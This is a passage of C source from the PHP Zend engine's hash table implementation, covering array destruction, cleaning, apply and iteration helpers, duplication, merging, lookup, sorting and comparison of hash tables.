if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
}
zend_hash_iterators_remove(ht);
} else if (EXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
return;
}
pefree(HT_GET_DATA_ADDR(ht), ht->u.flags & HASH_FLAG_PERSISTENT);
}
ZEND_API void ZEND_FASTCALL zend_array_destroy(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) <= 1);
/* break possible cycles */
GC_REMOVE_FROM_BUFFER(ht);
GC_TYPE_INFO(ht) = IS_NULL | (GC_WHITE << 16);
if (ht->nNumUsed) {
/* In some rare cases destructors of regular arrays may be changed */
if (UNEXPECTED(ht->pDestructor != ZVAL_PTR_DTOR)) {
zend_hash_destroy(ht);
goto free_ht;
}
p = ht->arData;
end = p + ht->nNumUsed;
SET_INCONSISTENT(HT_IS_DESTROYING);
if (ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS)) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
} while (++p != end);
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
zend_hash_iterators_remove(ht);
SET_INCONSISTENT(HT_DESTROYED);
} else if (EXPECTED(!(ht->u.flags & HASH_FLAG_INITIALIZED))) {
goto free_ht;
}
efree(HT_GET_DATA_ADDR(ht));
free_ht:
FREE_HASHTABLE(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_clean(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nNumUsed) {
p = ht->arData;
end = p + ht->nNumUsed;
if (ht->pDestructor) {
if (ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS)) {
if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
}
} while (++p != end);
}
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
ht->pDestructor(&p->val);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
} else {
if (!(ht->u.flags & (HASH_FLAG_PACKED|HASH_FLAG_STATIC_KEYS))) {
if (ht->nNumUsed == ht->nNumOfElements) {
do {
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
}
}
if (!(ht->u.flags & HASH_FLAG_PACKED)) {
HT_HASH_RESET(ht);
}
}
ht->nNumUsed = 0;
ht->nNumOfElements = 0;
ht->nNextFreeElement = 0;
ht->nInternalPointer = HT_INVALID_IDX;
}
ZEND_API void ZEND_FASTCALL zend_symtable_clean(HashTable *ht)
{
Bucket *p, *end;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (ht->nNumUsed) {
p = ht->arData;
end = p + ht->nNumUsed;
if (ht->u.flags & HASH_FLAG_STATIC_KEYS) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
} while (++p != end);
} else if (ht->nNumUsed == ht->nNumOfElements) {
do {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
} while (++p != end);
} else {
do {
if (EXPECTED(Z_TYPE(p->val) != IS_UNDEF)) {
i_zval_ptr_dtor(&p->val ZEND_FILE_LINE_CC);
if (EXPECTED(p->key)) {
zend_string_release(p->key);
}
}
} while (++p != end);
}
HT_HASH_RESET(ht);
}
ht->nNumUsed = 0;
ht->nNumOfElements = 0;
ht->nNextFreeElement = 0;
ht->nInternalPointer = HT_INVALID_IDX;
}
ZEND_API void ZEND_FASTCALL zend_hash_graceful_destroy(HashTable *ht)
{
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
p = ht->arData;
for (idx = 0; idx < ht->nNumUsed; idx++, p++) {
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (ht->u.flags & HASH_FLAG_INITIALIZED) {
pefree(HT_GET_DATA_ADDR(ht), ht->u.flags & HASH_FLAG_PERSISTENT);
}
SET_INCONSISTENT(HT_DESTROYED);
}
ZEND_API void ZEND_FASTCALL zend_hash_graceful_reverse_destroy(HashTable *ht)
{
uint32_t idx;
Bucket *p;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
idx = ht->nNumUsed;
p = ht->arData + ht->nNumUsed;
while (idx > 0) {
idx--;
p--;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (ht->u.flags & HASH_FLAG_INITIALIZED) {
pefree(HT_GET_DATA_ADDR(ht), ht->u.flags & HASH_FLAG_PERSISTENT);
}
SET_INCONSISTENT(HT_DESTROYED);
}
/* This is used to recurse elements and selectively delete certain entries
* from a hashtable. apply_func() receives the data and decides if the entry
* should be deleted or recursion should be stopped. The following three
* return codes are possible:
* ZEND_HASH_APPLY_KEEP - continue
* ZEND_HASH_APPLY_STOP - stop iteration
* ZEND_HASH_APPLY_REMOVE - delete the element, combineable with the former
*/
ZEND_API void ZEND_FASTCALL zend_hash_apply(HashTable *ht, apply_func_t apply_func)
{
uint32_t idx;
Bucket *p;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
for (idx = 0; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
result = apply_func(&p->val);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
break;
}
}
HASH_UNPROTECT_RECURSION(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_apply_with_argument(HashTable *ht, apply_func_arg_t apply_func, void *argument)
{
uint32_t idx;
Bucket *p;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
for (idx = 0; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
result = apply_func(&p->val, argument);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
break;
}
}
HASH_UNPROTECT_RECURSION(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_apply_with_arguments(HashTable *ht, apply_func_args_t apply_func, int num_args, ...)
{
uint32_t idx;
Bucket *p;
va_list args;
zend_hash_key hash_key;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
for (idx = 0; idx < ht->nNumUsed; idx++) {
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
va_start(args, num_args);
hash_key.h = p->h;
hash_key.key = p->key;
result = apply_func(&p->val, num_args, args, &hash_key);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
va_end(args);
break;
}
va_end(args);
}
HASH_UNPROTECT_RECURSION(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_reverse_apply(HashTable *ht, apply_func_t apply_func)
{
uint32_t idx;
Bucket *p;
int result;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
HASH_PROTECT_RECURSION(ht);
idx = ht->nNumUsed;
while (idx > 0) {
idx--;
p = ht->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
result = apply_func(&p->val);
if (result & ZEND_HASH_APPLY_REMOVE) {
_zend_hash_del_el(ht, HT_IDX_TO_HASH(idx), p);
}
if (result & ZEND_HASH_APPLY_STOP) {
break;
}
}
HASH_UNPROTECT_RECURSION(ht);
}
ZEND_API void ZEND_FASTCALL zend_hash_copy(HashTable *target, HashTable *source, copy_ctor_func_t pCopyConstructor)
{
uint32_t idx;
Bucket *p;
zval *new_entry, *data;
zend_bool setTargetPointer;
IS_CONSISTENT(source);
IS_CONSISTENT(target);
HT_ASSERT(GC_REFCOUNT(target) == 1);
setTargetPointer = (target->nInternalPointer == HT_INVALID_IDX);
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (setTargetPointer && source->nInternalPointer == idx) {
target->nInternalPointer = HT_INVALID_IDX;
}
/* INDIRECT element may point to UNDEF-ined slots */
data = &p->val;
if (Z_TYPE_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
if (UNEXPECTED(Z_TYPE_P(data) == IS_UNDEF)) {
continue;
}
}
if (p->key) {
new_entry = zend_hash_update(target, p->key, data);
} else {
new_entry = zend_hash_index_update(target, p->h, data);
}
if (pCopyConstructor) {
pCopyConstructor(new_entry);
}
}
if (target->nInternalPointer == HT_INVALID_IDX && target->nNumOfElements > 0) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
}
static zend_always_inline int zend_array_dup_element(HashTable *source, HashTable *target, uint32_t idx, Bucket *p, Bucket *q, int packed, int static_keys, int with_holes)
{
zval *data = &p->val;
if (with_holes) {
if (!packed && Z_TYPE_INFO_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
}
if (UNEXPECTED(Z_TYPE_INFO_P(data) == IS_UNDEF)) {
return 0;
}
} else if (!packed) {
/* INDIRECT element may point to UNDEF-ined slots */
if (Z_TYPE_INFO_P(data) == IS_INDIRECT) {
data = Z_INDIRECT_P(data);
if (UNEXPECTED(Z_TYPE_INFO_P(data) == IS_UNDEF)) {
return 0;
}
}
}
do {
if (Z_OPT_REFCOUNTED_P(data)) {
if (Z_ISREF_P(data) && Z_REFCOUNT_P(data) == 1 &&
(Z_TYPE_P(Z_REFVAL_P(data)) != IS_ARRAY ||
Z_ARRVAL_P(Z_REFVAL_P(data)) != source)) {
data = Z_REFVAL_P(data);
if (!Z_OPT_REFCOUNTED_P(data)) {
break;
}
}
Z_ADDREF_P(data);
}
} while (0);
ZVAL_COPY_VALUE(&q->val, data);
q->h = p->h;
if (packed) {
q->key = NULL;
} else {
uint32_t nIndex;
q->key = p->key;
if (!static_keys && q->key) {
zend_string_addref(q->key);
}
nIndex = q->h | target->nTableMask;
Z_NEXT(q->val) = HT_HASH(target, nIndex);
HT_HASH(target, nIndex) = HT_IDX_TO_HASH(idx);
}
return 1;
}
static zend_always_inline void zend_array_dup_packed_elements(HashTable *source, HashTable *target, int with_holes)
{
Bucket *p = source->arData;
Bucket *q = target->arData;
Bucket *end = p + source->nNumUsed;
do {
if (!zend_array_dup_element(source, target, 0, p, q, 1, 1, with_holes)) {
if (with_holes) {
ZVAL_UNDEF(&q->val);
}
}
p++; q++;
} while (p != end);
}
static zend_always_inline uint32_t zend_array_dup_elements(HashTable *source, HashTable *target, int static_keys, int with_holes)
{
uint32_t idx = 0;
Bucket *p = source->arData;
Bucket *q = target->arData;
Bucket *end = p + source->nNumUsed;
do {
if (!zend_array_dup_element(source, target, idx, p, q, 0, static_keys, with_holes)) {
uint32_t target_idx = idx;
idx++; p++;
while (p != end) {
if (zend_array_dup_element(source, target, target_idx, p, q, 0, static_keys, with_holes)) {
if (source->nInternalPointer == idx) {
target->nInternalPointer = target_idx;
}
target_idx++; q++;
}
idx++; p++;
}
return target_idx;
}
idx++; p++; q++;
} while (p != end);
return idx;
}
ZEND_API HashTable* ZEND_FASTCALL zend_array_dup(HashTable *source)
{
uint32_t idx;
HashTable *target;
IS_CONSISTENT(source);
ALLOC_HASHTABLE(target);
GC_REFCOUNT(target) = 1;
GC_TYPE_INFO(target) = IS_ARRAY;
target->nTableSize = source->nTableSize;
target->pDestructor = source->pDestructor;
if (source->nNumUsed == 0) {
target->u.flags = (source->u.flags & ~(HASH_FLAG_INITIALIZED|HASH_FLAG_PACKED|HASH_FLAG_PERSISTENT|ZEND_HASH_APPLY_COUNT_MASK)) | HASH_FLAG_APPLY_PROTECTION | HASH_FLAG_STATIC_KEYS;
target->nTableMask = HT_MIN_MASK;
target->nNumUsed = 0;
target->nNumOfElements = 0;
target->nNextFreeElement = 0;
target->nInternalPointer = HT_INVALID_IDX;
HT_SET_DATA_ADDR(target, &uninitialized_bucket);
} else if (GC_FLAGS(source) & IS_ARRAY_IMMUTABLE) {
target->u.flags = (source->u.flags & ~HASH_FLAG_PERSISTENT) | HASH_FLAG_APPLY_PROTECTION;
target->nTableMask = source->nTableMask;
target->nNumUsed = source->nNumUsed;
target->nNumOfElements = source->nNumOfElements;
target->nNextFreeElement = source->nNextFreeElement;
HT_SET_DATA_ADDR(target, emalloc(HT_SIZE(target)));
target->nInternalPointer = source->nInternalPointer;
memcpy(HT_GET_DATA_ADDR(target), HT_GET_DATA_ADDR(source), HT_USED_SIZE(source));
if (target->nNumOfElements > 0 &&
target->nInternalPointer == HT_INVALID_IDX) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
} else if (source->u.flags & HASH_FLAG_PACKED) {
target->u.flags = (source->u.flags & ~(HASH_FLAG_PERSISTENT|ZEND_HASH_APPLY_COUNT_MASK)) | HASH_FLAG_APPLY_PROTECTION;
target->nTableMask = source->nTableMask;
target->nNumUsed = source->nNumUsed;
target->nNumOfElements = source->nNumOfElements;
target->nNextFreeElement = source->nNextFreeElement;
HT_SET_DATA_ADDR(target, emalloc(HT_SIZE(target)));
target->nInternalPointer = source->nInternalPointer;
HT_HASH_RESET_PACKED(target);
if (target->nNumUsed == target->nNumOfElements) {
zend_array_dup_packed_elements(source, target, 0);
} else {
zend_array_dup_packed_elements(source, target, 1);
}
if (target->nNumOfElements > 0 &&
target->nInternalPointer == HT_INVALID_IDX) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
} else {
target->u.flags = (source->u.flags & ~(HASH_FLAG_PERSISTENT|ZEND_HASH_APPLY_COUNT_MASK)) | HASH_FLAG_APPLY_PROTECTION;
target->nTableMask = source->nTableMask;
target->nNextFreeElement = source->nNextFreeElement;
target->nInternalPointer = source->nInternalPointer;
HT_SET_DATA_ADDR(target, emalloc(HT_SIZE(target)));
HT_HASH_RESET(target);
if (target->u.flags & HASH_FLAG_STATIC_KEYS) {
if (source->nNumUsed == source->nNumOfElements) {
idx = zend_array_dup_elements(source, target, 1, 0);
} else {
idx = zend_array_dup_elements(source, target, 1, 1);
}
} else {
if (source->nNumUsed == source->nNumOfElements) {
idx = zend_array_dup_elements(source, target, 0, 0);
} else {
idx = zend_array_dup_elements(source, target, 0, 1);
}
}
target->nNumUsed = idx;
target->nNumOfElements = idx;
if (idx > 0 && target->nInternalPointer == HT_INVALID_IDX) {
target->nInternalPointer = 0;
}
}
return target;
}
ZEND_API void ZEND_FASTCALL _zend_hash_merge(HashTable *target, HashTable *source, copy_ctor_func_t pCopyConstructor, zend_bool overwrite ZEND_FILE_LINE_DC)
{
uint32_t idx;
Bucket *p;
zval *t;
IS_CONSISTENT(source);
IS_CONSISTENT(target);
HT_ASSERT(GC_REFCOUNT(target) == 1);
if (overwrite) {
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (UNEXPECTED(Z_TYPE(p->val) == IS_INDIRECT) &&
UNEXPECTED(Z_TYPE_P(Z_INDIRECT(p->val)) == IS_UNDEF)) {
continue;
}
if (p->key) {
t = _zend_hash_add_or_update_i(target, p->key, &p->val, HASH_UPDATE | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
} else {
t = zend_hash_index_update(target, p->h, &p->val);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
}
}
} else {
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (UNEXPECTED(Z_TYPE(p->val) == IS_INDIRECT) &&
UNEXPECTED(Z_TYPE_P(Z_INDIRECT(p->val)) == IS_UNDEF)) {
continue;
}
if (p->key) {
t = _zend_hash_add_or_update_i(target, p->key, &p->val, HASH_ADD | HASH_UPDATE_INDIRECT ZEND_FILE_LINE_RELAY_CC);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
} else {
t = zend_hash_index_add(target, p->h, &p->val);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
}
}
}
if (target->nNumOfElements > 0) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
}
static zend_bool ZEND_FASTCALL zend_hash_replace_checker_wrapper(HashTable *target, zval *source_data, Bucket *p, void *pParam, merge_checker_func_t merge_checker_func)
{
zend_hash_key hash_key;
hash_key.h = p->h;
hash_key.key = p->key;
return merge_checker_func(target, source_data, &hash_key, pParam);
}
ZEND_API void ZEND_FASTCALL zend_hash_merge_ex(HashTable *target, HashTable *source, copy_ctor_func_t pCopyConstructor, merge_checker_func_t pMergeSource, void *pParam)
{
uint32_t idx;
Bucket *p;
zval *t;
IS_CONSISTENT(source);
IS_CONSISTENT(target);
HT_ASSERT(GC_REFCOUNT(target) == 1);
for (idx = 0; idx < source->nNumUsed; idx++) {
p = source->arData + idx;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (zend_hash_replace_checker_wrapper(target, &p->val, p, pParam, pMergeSource)) {
t = zend_hash_update(target, p->key, &p->val);
if (t && pCopyConstructor) {
pCopyConstructor(t);
}
}
}
if (target->nNumOfElements > 0) {
idx = 0;
while (Z_TYPE(target->arData[idx].val) == IS_UNDEF) {
idx++;
}
target->nInternalPointer = idx;
}
}
/* Returns the hash table data if found and NULL if not. */
ZEND_API zval* ZEND_FASTCALL zend_hash_find(const HashTable *ht, zend_string *key)
{
Bucket *p;
IS_CONSISTENT(ht);
p = zend_hash_find_bucket(ht, key);
return p ? &p->val : NULL;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_str_find(const HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
Bucket *p;
IS_CONSISTENT(ht);
h = zend_inline_hash_func(str, len);
p = zend_hash_str_find_bucket(ht, str, len, h);
return p ? &p->val : NULL;
}
ZEND_API zend_bool ZEND_FASTCALL zend_hash_exists(const HashTable *ht, zend_string *key)
{
Bucket *p;
IS_CONSISTENT(ht);
p = zend_hash_find_bucket(ht, key);
return p ? 1 : 0;
}
ZEND_API zend_bool ZEND_FASTCALL zend_hash_str_exists(const HashTable *ht, const char *str, size_t len)
{
zend_ulong h;
Bucket *p;
IS_CONSISTENT(ht);
h = zend_inline_hash_func(str, len);
p = zend_hash_str_find_bucket(ht, str, len, h);
return p ? 1 : 0;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_index_find(const HashTable *ht, zend_ulong h)
{
Bucket *p;
IS_CONSISTENT(ht);
if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
p = ht->arData + h;
if (Z_TYPE(p->val) != IS_UNDEF) {
return &p->val;
}
}
return NULL;
}
p = zend_hash_index_find_bucket(ht, h);
return p ? &p->val : NULL;
}
ZEND_API zend_bool ZEND_FASTCALL zend_hash_index_exists(const HashTable *ht, zend_ulong h)
{
Bucket *p;
IS_CONSISTENT(ht);
if (ht->u.flags & HASH_FLAG_PACKED) {
if (h < ht->nNumUsed) {
if (Z_TYPE(ht->arData[h].val) != IS_UNDEF) {
return 1;
}
}
return 0;
}
p = zend_hash_index_find_bucket(ht, h);
return p ? 1 : 0;
}
ZEND_API void ZEND_FASTCALL zend_hash_internal_pointer_reset_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
for (idx = 0; idx < ht->nNumUsed; idx++) {
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return;
}
}
*pos = HT_INVALID_IDX;
}
/* This function will be extremely optimized by remembering
* the end of the list
*/
ZEND_API void ZEND_FASTCALL zend_hash_internal_pointer_end_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
idx = ht->nNumUsed;
while (idx > 0) {
idx--;
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return;
}
}
*pos = HT_INVALID_IDX;
}
ZEND_API int ZEND_FASTCALL zend_hash_move_forward_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
if (idx != HT_INVALID_IDX) {
while (1) {
idx++;
if (idx >= ht->nNumUsed) {
*pos = HT_INVALID_IDX;
return SUCCESS;
}
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return SUCCESS;
}
}
} else {
return FAILURE;
}
}
ZEND_API int ZEND_FASTCALL zend_hash_move_backwards_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
IS_CONSISTENT(ht);
HT_ASSERT(&ht->nInternalPointer != pos || GC_REFCOUNT(ht) == 1);
if (idx != HT_INVALID_IDX) {
while (idx > 0) {
idx--;
if (Z_TYPE(ht->arData[idx].val) != IS_UNDEF) {
*pos = idx;
return SUCCESS;
}
}
*pos = HT_INVALID_IDX;
return SUCCESS;
} else {
return FAILURE;
}
}
/* This function should be made binary safe */
ZEND_API int ZEND_FASTCALL zend_hash_get_current_key_ex(const HashTable *ht, zend_string **str_index, zend_ulong *num_index, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx != HT_INVALID_IDX) {
p = ht->arData + idx;
if (p->key) {
*str_index = p->key;
return HASH_KEY_IS_STRING;
} else {
*num_index = p->h;
return HASH_KEY_IS_LONG;
}
}
return HASH_KEY_NON_EXISTENT;
}
ZEND_API void ZEND_FASTCALL zend_hash_get_current_key_zval_ex(const HashTable *ht, zval *key, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx == HT_INVALID_IDX) {
ZVAL_NULL(key);
} else {
p = ht->arData + idx;
if (p->key) {
ZVAL_STR_COPY(key, p->key);
} else {
ZVAL_LONG(key, p->h);
}
}
}
ZEND_API int ZEND_FASTCALL zend_hash_get_current_key_type_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx != HT_INVALID_IDX) {
p = ht->arData + idx;
if (p->key) {
return HASH_KEY_IS_STRING;
} else {
return HASH_KEY_IS_LONG;
}
}
return HASH_KEY_NON_EXISTENT;
}
ZEND_API zval* ZEND_FASTCALL zend_hash_get_current_data_ex(HashTable *ht, HashPosition *pos)
{
uint32_t idx = *pos;
Bucket *p;
IS_CONSISTENT(ht);
if (idx != HT_INVALID_IDX) {
p = ht->arData + idx;
return &p->val;
} else {
return NULL;
}
}
ZEND_API void zend_hash_bucket_swap(Bucket *p, Bucket *q)
{
zval val;
zend_ulong h;
zend_string *key;
ZVAL_COPY_VALUE(&val, &p->val);
h = p->h;
key = p->key;
ZVAL_COPY_VALUE(&p->val, &q->val);
p->h = q->h;
p->key = q->key;
ZVAL_COPY_VALUE(&q->val, &val);
q->h = h;
q->key = key;
}
ZEND_API void zend_hash_bucket_renum_swap(Bucket *p, Bucket *q)
{
zval val;
ZVAL_COPY_VALUE(&val, &p->val);
ZVAL_COPY_VALUE(&p->val, &q->val);
ZVAL_COPY_VALUE(&q->val, &val);
}
ZEND_API void zend_hash_bucket_packed_swap(Bucket *p, Bucket *q)
{
zval val;
zend_ulong h;
ZVAL_COPY_VALUE(&val, &p->val);
h = p->h;
ZVAL_COPY_VALUE(&p->val, &q->val);
p->h = q->h;
ZVAL_COPY_VALUE(&q->val, &val);
q->h = h;
}
ZEND_API int ZEND_FASTCALL zend_hash_sort_ex(HashTable *ht, sort_func_t sort, compare_func_t compar, zend_bool renumber)
{
Bucket *p;
uint32_t i, j;
IS_CONSISTENT(ht);
HT_ASSERT(GC_REFCOUNT(ht) == 1);
if (!(ht->nNumOfElements>1) && !(renumber && ht->nNumOfElements>0)) { /* Doesn't require sorting */
return SUCCESS;
}
if (ht->nNumUsed == ht->nNumOfElements) {
i = ht->nNumUsed;
} else {
for (j = 0, i = 0; j < ht->nNumUsed; j++) {
p = ht->arData + j;
if (UNEXPECTED(Z_TYPE(p->val) == IS_UNDEF)) continue;
if (i != j) {
ht->arData[i] = *p;
}
i++;
}
}
sort((void *)ht->arData, i, sizeof(Bucket), compar,
(swap_func_t)(renumber? zend_hash_bucket_renum_swap :
((ht->u.flags & HASH_FLAG_PACKED) ? zend_hash_bucket_packed_swap : zend_hash_bucket_swap)));
HANDLE_BLOCK_INTERRUPTIONS();
ht->nNumUsed = i;
ht->nInternalPointer = 0;
if (renumber) {
for (j = 0; j < i; j++) {
p = ht->arData + j;
p->h = j;
if (p->key) {
zend_string_release(p->key);
p->key = NULL;
}
}
ht->nNextFreeElement = i;
}
if (ht->u.flags & HASH_FLAG_PACKED) {
if (!renumber) {
zend_hash_packed_to_hash(ht);
}
} else {
if (renumber) {
void *new_data, *old_data = HT_GET_DATA_ADDR(ht);
Bucket *old_buckets = ht->arData;
new_data = pemalloc(HT_SIZE_EX(ht->nTableSize, HT_MIN_MASK), (ht->u.flags & HASH_FLAG_PERSISTENT));
ht->u.flags |= HASH_FLAG_PACKED | HASH_FLAG_STATIC_KEYS;
ht->nTableMask = HT_MIN_MASK;
HT_SET_DATA_ADDR(ht, new_data);
memcpy(ht->arData, old_buckets, sizeof(Bucket) * ht->nNumUsed);
pefree(old_data, ht->u.flags & HASH_FLAG_PERSISTENT & HASH_FLAG_PERSISTENT);
HT_HASH_RESET_PACKED(ht);
} else {
zend_hash_rehash(ht);
}
}
HANDLE_UNBLOCK_INTERRUPTIONS();
return SUCCESS;
}
static zend_always_inline int zend_hash_compare_impl(HashTable *ht1, HashTable *ht2, compare_func_t compar, zend_bool ordered) {
uint32_t idx1, idx2;
if (ht1->nNumOfElements != ht2->nNumOfElements) {
return ht1->nNumOfElements > ht2->nNumOfElements ? 1 : -1;
}
for (idx1 = 0, idx2 = 0; idx1 < ht1->nNumUsed; idx1++) {
Bucket *p1 = ht1->arData + idx1, *p2;
zval *pData1, *pData2;
int result;
if (Z_TYPE(p1->val) == IS_UNDEF) continue;
if (ordered) {
while (1) {
ZEND_ASSERT(idx2 != ht2->nNumUsed);
p2 = ht2->arData + idx2;
if (Z_TYPE(p2->val) != IS_UNDEF) break;
idx2++;
}
if (p1->key == NULL && p2->key == NULL) { /* numeric indices */
if (p1->h != p2->h) {
return p1->h > p2->h ? 1 : -1;
}
} else if (p1->key != NULL && p2->key != NULL) { /* string indices */
if (ZSTR_LEN(p1->key) != ZSTR_LEN(p2->key)) {
return ZSTR_LEN(p1->key) > ZSTR_LEN(p2->key) ? 1 : -1;
}
result = memcmp(ZSTR_VAL(p1->key), ZSTR_VAL(p2->key), ZSTR_LEN(p1->key));
if (result != 0) {
return result;
}
} else {
/* Mixed key types: A string key is considered as larger */
return p1->key != NULL ? 1 : -1;
}
pData2 = &p2->val;
idx2++;
} else {
if (p1->key == NULL) { /* numeric index */
pData2 = zend_hash_index_find(ht2, p1->h);
if (pData2 == NULL) {
return 1;
}
} else { /* string index */
pData2 = zend_hash_find(ht2, p1->key);
if (pData2 == NULL) {
return 1;
}
}
}
pData1 = &p1->val;
if (Z_TYPE_P(pData1) == IS_INDIRECT) {
pData1 = Z_INDIRECT_P(pData1);
}
if (Z_TYPE_P(pData2) == IS_INDIRECT) {
pData2 = Z_INDIRECT_P(pData2);
}
if (Z_TYPE_P(pData1) == IS_UNDEF) {
if (Z_TYPE_P(pData2) != IS_UNDEF) {
return -1;
}
} else if (Z_TYPE_P(pData2) == IS_UNDEF) {
return 1;
} else {
result = compar(pData1, pData2);
if (result != 0) {
return result;
}
}
}
return 0;
}
ZEND_API int zend_hash_compare(HashTable *ht1, HashTable *ht2, compare_func_t compar, zend_bool ordered)
{
int result;
IS_CONSISTENT(ht1);
IS_CONSISTENT(ht2);
